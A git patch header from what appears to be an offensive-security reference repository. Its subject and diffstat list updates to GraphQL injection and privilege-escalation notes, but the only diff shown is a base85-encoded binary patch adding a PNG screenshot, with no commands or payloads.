From 93f6c03b54fd239486233f0b46bba513ba1e7046 Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Sun, 9 Jun 2019 13:46:40 +0200
Subject: [PATCH] GraphQL + LXD/etc/passwd PrivEsc + Win firewall

---
 GraphQL Injection/Images/htb-help.png         | Bin 0 -> 21217 bytes
 GraphQL Injection/README.md                   |  21 ++++++++++++------
 .../Linux - Privilege Escalation.md           |  10 +++++++++
 .../Network Pivoting Techniques.md            |   1 +
 .../Windows - Privilege Escalation.md         |   7 ++++++
 SAML Injection/README.md                      |   2 +-
 6 files changed, 33 insertions(+), 8 deletions(-)
 create mode 100644 GraphQL Injection/Images/htb-help.png

diff --git a/GraphQL Injection/Images/htb-help.png b/GraphQL Injection/Images/htb-help.png
new file mode 100644
index 0000000000000000000000000000000000000000..5b0493be7a70da5f0a51f6d7b4163f973da4d949
GIT binary patch
literal 21217
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
